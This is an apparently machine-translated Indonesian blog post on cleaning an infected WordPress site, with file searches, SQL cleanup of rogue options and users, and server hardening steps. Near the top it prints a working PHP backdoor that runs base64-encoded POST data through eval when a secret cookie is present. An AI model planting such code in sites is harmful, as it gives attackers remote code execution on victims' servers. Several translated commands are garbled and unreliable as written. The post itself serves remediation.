WordPress Exploit - Membersihkan file virus, SQL dan keamanan server.

Sebelum Anda membaca posting ini, Anda akan melihat posting di sini, Untuk memahami sesuatu. :)

Saya menemukannya di beberapa file blog di stealthsettings.com, kode yang mirip dengan yang di bawah ini, yang muncul sebagai akibat dari virus dengan prestasi dari WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcJika di atas adalah tentang file xmlrpc.php dari sepi, Pada grep Server, sepertinya cukup banyak semacam ini dalam kode sumber.

pppffiuuu

Membersihkan file yang terinfeksi:

Ooookkkk ...
1. Solusi terbaik, seperti yang dilakukan backupDan dibersihkan database adalah untuk menghapus arsip WordPress (Anda dapat menyimpan wp-config.php dan file yang tidak terkait erat dengan platform wp, setelah diperiksa dengan cermat) dari server dan unggah yang asli dari versi 2.5.1 (Pada kesempatan ini dan membuat upgrade versi wp :)) http://wordpress.org/download/ . Lap termasuk file tema jika Anda tidak percaya bahwa pemeriksaan hati mereka.

Tampaknya telah dipengaruhi dan file dari tema-tema yang belum pernah digunakan sebelumnya di blog dan hanya mengubah tema, tidak memecahkan masalah.

./andreea/wp-content/themes/default/indeks.php:

2. Cari dan menghapus semua file yang berisi:... Pngg * _new.php, * _old.php, * Jpgg, * Giff, * dan file wp-info.txt, jika ada.

Temukan. -name “* _new.php”
Temukan. -name “* _old.php”
Temukan. -name "* .jpgg"
Temukan. -name “* _giff”
Temukan. -name “* _pngg”
Temukan. -name “wp-info.txt”

3. di / Tmp , Cari dan menghapus folder seperti tmpYwbzT2

Pembersihan SQL :

1. pada Tabel Tabel wp_options Periksa dan menghapus baris: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Semua di wp_options, pergi ke active_plugins dan hapus jika ada sebuah plugin yang berakhir di salah satu ekstensi * _new.php, * _old.php, *. jpgg, *. giff, *. pngg atau jika perpanjangan dicurigai, periksa dengan seksama.

3. Pada Tabel wp_users, Lihat apakah ada pengguna yang tidak menulis apapun di tangan kanan, kolom user_nicename. Hapus pengguna ini, tetapi ingat nomor di kolom ID. Pengguna ini kemungkinan akan menggunakan "WordPress”Ca user_login dibuat dan muncul di 00: 00: 00 0000-00-00.

4. Pergi ke Tabel wp_usermeta dan menghapus semua baris milik ID di atas.

Setelah Anda melakukan pembersihan sql ini, nonaktifkan lalu aktifkan plugin apa pun. (di blog -> Dashboard -> Plugins)

Server yang aman:

1. Lihat apa direktori dan file "ditulis"(chmod 777) dan coba letakkan a chmod yang tidak lagi mengizinkan tulisan mereka di tingkat mana pun. (chmod 644, misalnya)

Cari. -Perm-2-ls

2. Melihat file apa memiliki set bit SUID atau SGID . Jika Anda tidak menggunakan file-file menempatkan mereka chmod 0 atau menghapus paket yang berisi. Mereka sangat berbahaya, karena mereka melaksanakan hak "kelompok"Atau"akar"Bukan dengan hak user biasa untuk menjalankan file tersebut.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Periksa apa port yang terbuka dan mencoba untuk menutup atau mengamankan mereka yang tidak digunakan.

netstat-an | grep-i mendengarkan

Begitu banyak. Begitu Beberapa blog dilarang de Google Search dan yang lain mengatakan "Dia melakukannya dengan baik!!!" . Yah, saya akan melakukannya untuk mereka... tapi apa yang Anda katakan jika Google mulai melarang semua situs pembentukan  IS SPAM dan menempatkan Trojans (Trojan.Clicker.HTML) dalam cookie?

Sebagai pecinta teknologi, saya dengan senang hati menulis di StealthSettings.com sejak tahun 2006. Saya memiliki pengalaman yang kaya dalam sistem operasi: macOS, Windows, dan Linux, serta dalam bahasa pemrograman dan platform blogging (WordPress) dan toko online (WooCommerce, Magento, PrestaShop).

How to » AntiVirus & Keamanan » WordPress Exploit - Membersihkan file virus, SQL dan keamanan server.

Saya berpikir tentang “WordPress Eksploitasi - Bersihkan file virus, SQL, dan keamanan server. ”

Tinggalkan Komentar